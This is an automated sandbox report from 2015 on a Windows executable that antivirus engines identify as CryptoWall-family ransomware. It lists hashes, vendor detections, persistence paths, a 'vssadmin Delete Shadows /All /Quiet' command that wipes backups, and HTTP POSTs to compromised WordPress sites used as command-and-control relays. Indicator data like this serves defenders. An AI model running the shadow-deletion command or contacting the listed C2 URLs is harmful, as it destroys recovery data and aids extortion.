Analysis Date: 2015-12-08 09:44:48
MD5: 9bc348b33fa72da3bb32f91b10e0ad5e
SHA1: 9f2ab90d3807007bb9c85c1ffc2349343493775b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: f8b45eb4ba38935632a4922176667784 sha1: f6fc284148dbc01ff96238bfe00ee976c7f34cf2 size: 73728
Section .rdata md5: 70c46a804bf95b1733efaa2e0b54417e sha1: d7a4dc264f1cd9f3227357d8009631b36a4ad9c4 size: 4096
Section .data md5: 197450fe35ac9116613cb8daaa72fc49 sha1: 124085e5325a3a22665f3cae7f57be75b84630ec size: 8192
Section .rsrc md5: 06d05e1b0a042d0dd5f8e12434d46082 sha1: 8808d7159415f7c91abcd70dd38ae87185e64874 size: 163840
Timestamp: 2007-08-19 18:59:40
Version:
LegalCopyright: Mouthparts © 2018
ProductName: Flattest Gathers
FileVersion: 0,255,64,38
CompanyName: Memeo Inc.
Packer: Microsoft Visual C++ v6.0
PEhash: 4cb7b170086b654741dc31a55e974bbffa9ce234
IMPhash: 8138f8c8c60b43fd5d525ee6d0d477de
AV Frisk (f-prot): no_virus
AV Mcafee: Ransom-CWall.b
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Dr. Web: Trojan.Encoder.514
AV Microsoft Security Essentials: Ransom:Win32/Crowti
AV F-Secure: Trojan.GenericKD.2890184
AV CA (E-Trust Ino): no_virus
AV MicroWorld (escan): Trojan.GenericKD.2890184
AV BitDefender: Trojan.GenericKD.2890184
AV Grisoft (avg): Zbot.AKCB
AV Padvish: no_virus
AV Rising: no_virus
AV Emsisoft: Trojan.GenericKD.2890184
AV Arcabit (arcavir): Trojan.GenericKD.2890184
AV Ikarus: Trojan.Win32.Filecoder
AV CAT (quickheal): no_virus
AV Symantec: Trojan.Cryptodefense
AV Eset (nod32): Win32/Filecoder.CO
AV K7: Trojan ( 004b96871 )
AV Trend Micro: Ransom_.F439C15A
AV Avira (antivir): TR/AD.Crowti.Y.603
AV BullGuard: Trojan.GenericKD.2890184
AV Twister: no_virus
AV Kaspersky: no_virus
AV Fortinet: W32/Yakes.NNEX!tr
AV VirusBlokAda (vba32): no_virus
AV ClamAV: no_virus
AV MalwareBytes: Trojan.Rovnix
AV Zillya!: no_virus
AV Authentium: no_virus
AV Ad-Aware: Trojan.GenericKD.2890184

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates File: C:\6ff06165\6ff06165.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process: -k netsvcs
Creates Process: vssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: autonomenab.se
Winsock DNS: anime-tuner.square7.ch
Winsock DNS: andersvision.com
Winsock DNS: alexandra.uz
Winsock DNS: abisoglu.com
Winsock DNS: alf-shop.com.ua
Winsock DNS: attcompany.com
Winsock DNS: abrtl.com
Winsock DNS: 10bestdatingsites.dev.belugalab.com
Winsock DNS: assomise.com.br
Winsock DNS: aldgateeastescorts4u.eu
Winsock DNS: bataviarealty.com
Winsock DNS: curlmyip.com
Winsock DNS: antoine.leclerc.photos
Winsock DNS: amandabugge.dk
Winsock DNS: atcoghost.com
Winsock DNS: 63notes.com
Winsock DNS: avancarvisual.com.br
Winsock DNS: boletininformativocma.tecsalud.mx
Winsock DNS: adeolamedia.com
Winsock DNS: myexternalip.com
Winsock DNS: barbicanescorts4u.eu
Winsock DNS: animaskin.no
Winsock DNS: ip-addr.es
Winsock DNS: crumerycpa.com

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc

Network Details:

DNS: ip-addr.es Type: A ➝ 188.165.164.184
DNS: myexternalip.com Type: A ➝ 78.47.139.102
DNS: curlmyip.com Type: A ➝ 184.106.112.172
DNS: 10bestdatingsites.dev.belugalab.com Type: A ➝ 95.85.47.44
DNS: alf-shop.com.ua Type: A ➝ 178.20.152.1
DNS: assomise.com.br Type: A ➝ 186.202.127.248
DNS: amandabugge.dk Type: A ➝ 104.27.144.88
DNS: amandabugge.dk Type: A ➝ 104.27.145.88
DNS: andersvision.com Type: A ➝ 109.72.85.200
DNS: adeolamedia.com Type: A ➝ 46.30.212.60
DNS: abisoglu.com Type: A ➝ 212.175.84.173
DNS: atcoghost.com Type: A ➝ 104.27.179.208
DNS: atcoghost.com Type: A ➝ 104.27.178.208
DNS: animaskin.no Type: A ➝ 91.205.172.75
DNS: alexandra.uz Type: A ➝ 81.177.139.245
DNS: barbicanescorts4u.eu Type: A ➝ 46.102.252.68
DNS: abrtl.com Type: A ➝ 46.30.212.147
DNS: bataviarealty.com Type: A ➝ 111.68.119.34
DNS: anime-tuner.square7.ch Type: A ➝ 148.251.48.69
DNS: boletininformativocma.tecsalud.mx Type: A ➝ 189.212.87.21
DNS: avancarvisual.com.br Type: A ➝ 189.26.236.163
DNS: attcompany.com Type: A ➝ 78.110.50.154
DNS: antoine.leclerc.photos Type: A ➝ 37.59.9.128
DNS: aldgateeastescorts4u.eu Type: A ➝ 46.102.252.68
DNS: 63notes.com Type: A ➝ 173.248.136.212
DNS: autonomenab.se Type: A ➝ 46.30.212.119
DNS: crumerycpa.com Type: A
HTTP GET: http://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://10bestdatingsites.dev.belugalab.com/wp-content/plugins/wp-db-ajax-made/UIWL5N.php?z=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://alf-shop.com.ua/wp-content/plugins/wp-db-backup-made/OIZw29.php?i=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://assomise.com.br/wp-content/plugins/wp-db-backup-made/4n8svu.php?c=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://amandabugge.dk/wp-content/plugins/wp-db-backup-made/Ve4wgx.php?t=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://andersvision.com/wp-content/plugins/wp-db-backup-made/yq9RrN.php?k=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://adeolamedia.com/wp-content/plugins/wp-db-backup-made/P_tfk9.php?u=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://abisoglu.com/wp-content/themes/twentythirteen/iLBfkn.php?w=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://atcoghost.com/wp-content/plugins/wp-db-backup-made/CRX7U9.php?a=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://animaskin.no/wp-content/themes/twentytwelve/gVa9E3.php?x=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://alexandra.uz/wp-content/themes/twentyeleven/VZo0pj.php?k=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://barbicanescorts4u.eu/wp-content/plugins/wp-db-backup-made/LOdI5b.php?x=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://abrtl.com/wp-content/plugins/wp-db-backup-made/3ILBop.php?k=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://bataviarealty.com/wp-content/plugins/wp-db-backup-made/bcXklL.php?n=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://anime-tuner.square7.ch/wp-content/themes/twentyeleven/MsTGk_.php?i=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://boletininformativocma.tecsalud.mx/ifmY18.php?o=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://avancarvisual.com.br/wp-content/themes/twentytwelve/VzkgnX.php?b=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://attcompany.com/wp-content/themes/twentytwelve/x0CGOg.php?z=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://antoine.leclerc.photos/wp-content/themes/twentyeleven/EQDaXr.php?m=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://aldgateeastescorts4u.eu/wp-content/plugins/wp-db-backup-made/YXzCAO.php?z=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://63notes.com/wp-content/plugins/wp-db-backup-made/kT_7yf.php?l=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://autonomenab.se/wp-content/plugins/wp-db-backup-made/H0zbxa.php?w=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP: 192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP: 192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP: 192.168.1.1:1034 ➝ 95.85.47.44:80
Flows TCP: 192.168.1.1:1035 ➝ 178.20.152.1:80
Flows TCP: 192.168.1.1:1036 ➝ 186.202.127.248:80
Flows TCP: 192.168.1.1:1037 ➝ 104.27.144.88:80
Flows TCP: 192.168.1.1:1038 ➝ 109.72.85.200:80
Flows TCP: 192.168.1.1:1039 ➝ 46.30.212.60:80
Flows TCP: 192.168.1.1:1040 ➝ 212.175.84.173:80
Flows TCP: 192.168.1.1:1041 ➝ 104.27.179.208:80
Flows TCP: 192.168.1.1:1042 ➝ 91.205.172.75:80
Flows TCP: 192.168.1.1:1043 ➝ 81.177.139.245:80
Flows TCP: 192.168.1.1:1044 ➝ 46.102.252.68:80
Flows TCP: 192.168.1.1:1045 ➝ 46.30.212.147:80
Flows TCP: 192.168.1.1:1046 ➝ 111.68.119.34:80
Flows TCP: 192.168.1.1:1047 ➝ 148.251.48.69:80
Flows TCP: 192.168.1.1:1048 ➝ 189.212.87.21:80
Flows TCP: 192.168.1.1:1049 ➝ 189.26.236.163:80
Flows TCP: 192.168.1.1:1050 ➝ 78.110.50.154:80
Flows TCP: 192.168.1.1:1051 ➝ 37.59.9.128:80
Flows TCP: 192.168.1.1:1052 ➝ 46.102.252.68:80
Flows TCP: 192.168.1.1:1053 ➝ 173.248.136.212:80
Flows TCP: 192.168.1.1:1054 ➝ 46.30.212.119:80
